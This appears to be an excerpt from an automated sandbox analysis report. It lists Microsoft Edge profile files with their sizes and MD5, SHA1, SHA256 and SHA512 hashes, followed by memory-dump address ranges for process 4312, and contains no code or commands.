                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                00d3d4ccd3e7c3dc004532124668b663

                                                                SHA1

                                                                b9c82cc58148b771735fef45b87e3ac134d8907a

                                                                SHA256

                                                                0989ff9141aeb211034748a62528175c23591d1ed6137dfffaff4c1cf8d2c6d9

                                                                SHA512

                                                                1ddb9b7b4372cf5f24b7b33951f026a0b09460134ef970274cde5cbddf22e76c5b496585598a1cddb584a2eb0825212e09689dd540621ad88277813d8753493b

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                Filesize

                                                                28KB

                                                                MD5

                                                                b525e2e8fecaae2221c478156bc420b5

                                                                SHA1

                                                                da3fa323eeba97a34d9d1f2cc180a588b84282e5

                                                                SHA256

                                                                519fc6635e0ca2599b6d8314851c4a1c68f86b4198d313e8b2eb3ab4bda6def4

                                                                SHA512

                                                                53cd8c6b53db3d342e2e85a15f7ea9aa1a035bf5b66b48b5002dd2619c2870f1060cebc26974d2e535afc60180a376fb2f1b542be29aa9eb9c434dbccc3885b0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                Filesize

                                                                264KB

                                                                MD5

                                                                f50f89a0a91564d0b8a211f8921aa7de

                                                                SHA1

                                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                SHA256

                                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                SHA512

                                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                Filesize

                                                                124KB

                                                                MD5

                                                                09345989c0e44ad5c13420762fbe7a66

                                                                SHA1

                                                                903fb8a93d90a347bdd570df76b528307335ace3

                                                                SHA256

                                                                f93bd2503c50cc2b76441fafe0f2a24f85ccb476f39259837d35b4cbcb7eba5f

                                                                SHA512

                                                                fe8dd347ab03c026aeef0c8bbdb0a9d996b157c9d50b61e48561865b4803893c5f54df1e6f1908afc21f3659f238e5da9f23588f86586e223f6b8b065ff0d8c3

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                45de4c3b4d4969e93c9185b5384a260d

                                                                SHA1

                                                                6dedaaf3249fd39f069c66da1dfdd44ed80659f7

                                                                SHA256

                                                                c8529ded9ab75412020bcdb539c664209827420750f513ea3722eb66556151c4

                                                                SHA512

                                                                620acecee842e143b35dc313a6a02497371ae448bd1f332aa0bc991798002e46620871046bcb89e0082594642a00e8bfb6cf5c94c9aba770bf0462be9903d49d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                6KB

                                                                MD5

                                                                56d51acd7d1c29b3abc79d184d3db647

                                                                SHA1

                                                                64253a87341e9ec3c3e22cdba95683bdbf8faa85

                                                                SHA256

                                                                7e66b9fcc9b561d882277182dd6a47f9ccc63bb4ff0c0cad0f3b56406f4d1100

                                                                SHA512

                                                                8df9a793520208e69883d2302c0496dc28485b64351d551d0f6958261035042c89f7e049e6d56c030fdb9798fd7e91b7a75f481203358a8b2e2142ab26c38a93

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                833b4bdcf4e00199802f100cce0120c5

                                                                SHA1

                                                                de6b02c48a9e8e05c18b210976995db791f3ef35

                                                                SHA256

                                                                c9373cbab7092e32c3b495eec6000926c9decf6ce00ece9ee590f459a19ddf57

                                                                SHA512

                                                                1c4c4eb67d2a7fec86b0bc2d8cda7f53fa76cfea5d8865664e6b9f1175b40cd5c25503129ba7294eab850c0fb563c36200b7b314c6a9a8c08fabad59b7fab755

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                221d6e589144d08f21f8761f008c59f3

                                                                SHA1

                                                                2c35e4b1f4245c3f34159eab477970445078c95a

                                                                SHA256

                                                                a9e2f57292d1f3934988a815aee8a59b12d9282a9e3bf6f95d22726b806bbd8d

                                                                SHA512

                                                                367857e2a1925c869cc08f6114ee98f576a34a7be57045648e7c357a85b1dbb0a8b9d2b9af95f131ecb49207d20f483249ababece5c4561b0edf3ef8639aa434

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                Filesize

                                                                256B

                                                                MD5

                                                                e12c06a12af137460b7398aed8433a21

                                                                SHA1

                                                                240795b4dd3fd55f082846c2b8b222bbd5db137b

                                                                SHA256

                                                                1758fed57635b53f7380facfb96d4fb990ec797f289958339370bd1d803fb15e

                                                                SHA512

                                                                3e7329bf46ac4b9ffa92acfbf3d5dfdbeafbe33f538771027e1965ce3936f9d4d24889662eeb12519a67c9c84e45dab11e059155deb81a95602bfd6274b0660c

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                Filesize

                                                                350B

                                                                MD5

                                                                4d1733850ebaa043a081dd6f4b4b6c27

                                                                SHA1

                                                                80aeb0eac6587a6ea54445bcad3e50b0393b8331

                                                                SHA256

                                                                a94cf0f7f587e8ba432b8ae6b4a558cfd1edb257ff0329b5906d708c0c4b8794

                                                                SHA512

                                                                747d580f02f5df35bd942ed0f06428ff7d50b13567c2126293bc279592fe65e3f6f29db5fd0266dbd50cd824d8cfb510d10fc1de153697a4ea0acdc5989e5041

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                Filesize

                                                                326B

                                                                MD5

                                                                6ab1cc74b2ac4d7a32342c8211ab278b

                                                                SHA1

                                                                c7c3ff490458a058c87a8a001c71d2f70d6314f9

                                                                SHA256

                                                                6cf75dd381bd4e001ad5a6e92bd10541146ff1ec5daadb51233292ace8c3d9d2

                                                                SHA512

                                                                56d0c3494787dfa4dc7bc6899ce5e7ef8e52554b9fc3de367ae7d86bcf95020c7b5ae70f07e28eaf431602ca49381db7a017ec8bf2674805d2736dcabedf9c30

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                233fa09b4e5c0b0cb4b8b8fef6377114

                                                                SHA1

                                                                96b24076c36fc184bd529dba67b326abfc0783ee

                                                                SHA256

                                                                406270707fe5dfa985cfa963f4da7f090812531d16aa824786d81f497a3819f6

                                                                SHA512

                                                                01def0bb3e8d177f32154014dc4060eff2706f546d13570f3464ae3dc47b846b99ff5139c0a5443ee8ba4c2c480a341d191fd6ddc2feb371731e44e68acb9918

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5823a0.TMP

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                7602d45f633da6ac4e111f030c92fd93

                                                                SHA1

                                                                ae3d0313c7c93b6a288ab36d89301e0eb7c5ab7d

                                                                SHA256

                                                                4d3f44468c029c233477230bafe470537fcf6e7d42af02550f44aba448ab134e

                                                                SHA512

                                                                c5ffaab71eeb1ce32d40ba9643a306fd32455a7eca57d367b15758b7191b440d41f5cf19a642446656e9efd2e67b3a6851cc581c0e25d98a1907144aa65db45d

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                Filesize

                                                                128KB

                                                                MD5

                                                                99b1b2c195b6a7eb6139a1bc87a5c0da

                                                                SHA1

                                                                da0218f714f083ce6c7e504f8fa71df614eb4079

                                                                SHA256

                                                                35821bd379a799f68dd0ee99f32e9a8e2815b2c82faea4c030c8355bd756d65c

                                                                SHA512

                                                                d0f688486ee48b92dc14f8b3554b5a59c7aff445c91283637daff21350364d002d4f7c05cb8f8137c3561b0582b558b1d753633fd42a6b4f89d0c737db6bd3b0

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                Filesize

                                                                16B

                                                                MD5

                                                                6752a1d65b201c13b62ea44016eb221f

                                                                SHA1

                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                SHA256

                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                SHA512

                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                Filesize

                                                                11B

                                                                MD5

                                                                838a7b32aefb618130392bc7d006aa2e

                                                                SHA1

                                                                5159e0f18c9e68f0e75e2239875aa994847b8290

                                                                SHA256

                                                                ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

                                                                SHA512

                                                                9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                6e884d8691c15cacab389befb178786e

                                                                SHA1

                                                                c62132771b5c4f06dc2703818baa34fc7c420e7f

                                                                SHA256

                                                                f256eb86ed3c51b78d5318ffb0cbf23398de52eb50698a69737f541455d14c48

                                                                SHA512

                                                                053e6dadc541513241045d2cd400ea6e570376f11cd8a60cef8dfaad9b3948ef2a7d9493077e4da1941bd40c659a860be898f262ce33a738345ec86ab49a1743

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                10KB

                                                                MD5

                                                                bcbe4d90e257d10154ea8a5dada59a46

                                                                SHA1

                                                                4679df7b522f9a6956317d714310c61fd4115de5

                                                                SHA256

                                                                0d5fb09d671ec2f4328c8b6c04cd249b5292b354b29e8afb9e7f215aea09661d

                                                                SHA512

                                                                1b0d8904aca1b11a33854e753e3a3f2efcea40d859446fb2e016e2ca4fcd0cf8f2c0e04a8b16ca84b8f3f0bd2eb6573357d7eac567137df84bd1837acca65faf

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                Filesize

                                                                10KB

                                                                MD5

                                                                061d534b51b60efdecb2eee526b5d53f

                                                                SHA1

                                                                1272759381c357b9677f0f6ddd0a19f53ec6ed91

                                                                SHA256

                                                                d8883dd14b57fe36969b425c54106f70ea19c92041df229a3b817ca1ddfab894

                                                                SHA512

                                                                e8125f0a1fef18f14341af5550648edc9ce55055b003938133500db2ac0ae73c149d1f4f6055999283564a55102c6907e27b25535ee6bc064d17ae5454f69228

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\eb2888d1-ba18-4a8a-bc67-47235ec3bfa4.tmp

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                f728b2e9694e07762d13685593a16065

                                                                SHA1

                                                                ac59f250f3833d4ea0f51e93e810951a87269e08

                                                                SHA256

                                                                5d124b6e7bf9b34e1973b219b45ae456f6238fc01d6a13795e7f1a7ccf24f015

                                                                SHA512

                                                                c0b5f759d1eee92ad3b2c2fdd90ad0201d93a6dc62792722c4b9197c725def1c156410ecb5bb9094f4759c39f41eb155c253a55e59d0b1b049a439e3f8d37a81

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

                                                                Filesize

                                                                4B

                                                                MD5

                                                                2932858f03e049eb7ec77328b0b01135

                                                                SHA1

                                                                940b0d326555e0a8be99451eaac4c6c2e1a0a74f

                                                                SHA256

                                                                3e985d15e9d39d2a97931a19e4adedc107dc999c692d6058745423d0225b9211

                                                                SHA512

                                                                41602e9301810db08d52b77c0d17f74f7ec7e3cef0a02058df21c04f8deb1d2eac6198397cdf4ba23be000e91761639e39b00769cf5b203732922f2e90271f0c

                                                              • memory/4312-31-0x0000000007BA0000-0x0000000007BB2000-memory.dmp

                                                                Filesize

                                                                72KB

                                                              • memory/4312-51-0x0000000007C00000-0x0000000007C1F000-memory.dmp

                                                                Filesize

                                                                124KB

                                                              • memory/4312-24-0x0000000007B70000-0x0000000007B98000-memory.dmp

                                                                Filesize

                                                                160KB

                                                              • memory/4312-32-0x0000000007B30000-0x0000000007B3C000-memory.dmp

                                                                Filesize

                                                                48KB

                                                              • memory/4312-57-0x00000000013B4000-0x00000000013B5000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/4312-39-0x000000000B580000-0x000000000B634000-memory.dmp

                                                                Filesize

                                                                720KB

                                                              • memory/4312-35-0x0000000007B30000-0x0000000007B3C000-memory.dmp

                                                                Filesize

                                                                48KB

                                                              • memory/4312-36-0x000000000B580000-0x000000000B634000-memory.dmp

                                                                Filesize

                                                                720KB

                                                              • memory/4312-40-0x0000000007B20000-0x0000000007B26000-memory.dmp

                                                                Filesize

                                                                24KB

                                                              • memory/4312-43-0x0000000007B20000-0x0000000007B26000-memory.dmp

                                                                Filesize

                                                                24KB

                                                              • memory/4312-44-0x0000000007C20000-0x0000000007C5A000-memory.dmp

                                                                Filesize

                                                                232KB

                                                              • memory/4312-47-0x0000000007C20000-0x0000000007C5A000-memory.dmp

                                                                Filesize

                                                                232KB

                                                              • memory/4312-48-0x0000000007C00000-0x0000000007C1F000-memory.dmp

                                                                Filesize

                                                                124KB

                                                              • memory/4312-52-0x0000000007C60000-0x0000000007C75000-memory.dmp

                                                                Filesize

                                                                84KB

                                                              • memory/4312-55-0x0000000007C60000-0x0000000007C75000-memory.dmp

                                                                Filesize

                                                                84KB

                                                              • memory/4312-27-0x0000000007B70000-0x0000000007B98000-memory.dmp

                                                                Filesize

                                                                160KB

                                                              • memory/4312-0-0x00000000013B4000-0x00000000013B5000-memory.dmp

                                                                Filesize

                                                                4KB

                                                              • memory/4312-29-0x0000000007BA0000-0x0000000007BB2000-memory.dmp

                                                                Filesize

                                                                72KB

                                                              • memory/4312-19-0x0000000007290000-0x00000000072A3000-memory.dmp

                                                                Filesize

                                                                76KB

                                                              • memory/4312-23-0x0000000007B40000-0x0000000007B63000-memory.dmp

                                                                Filesize

                                                                140KB

                                                              • memory/4312-20-0x0000000007B40000-0x0000000007B63000-memory.dmp

                                                                Filesize

                                                                140KB

                                                              • memory/4312-16-0x0000000007290000-0x00000000072A3000-memory.dmp

                                                                Filesize

                                                                76KB

                                                              • memory/4312-7-0x0000000008700000-0x00000000092E9000-memory.dmp

                                                                Filesize

                                                                11.9MB

                                                              • memory/4312-11-0x0000000007230000-0x0000000007270000-memory.dmp

                                                                Filesize

                                                                256KB

                                                              • memory/4312-12-0x0000000007200000-0x0000000007211000-memory.dmp

                                                                Filesize

                                                                68KB

                                                              • memory/4312-15-0x0000000007200000-0x0000000007211000-memory.dmp

                                                                Filesize

                                                                68KB

                                                              • memory/4312-8-0x0000000007230000-0x0000000007270000-memory.dmp

                                                                Filesize

                                                                256KB

                                                              • memory/4312-4-0x0000000008700000-0x00000000092E9000-memory.dmp

                                                                Filesize

                                                                11.9MB

                                                              • memory/4312-2-0x0000000000400000-0x0000000000D8A000-memory.dmp

                                                                Filesize

                                                                9.5MB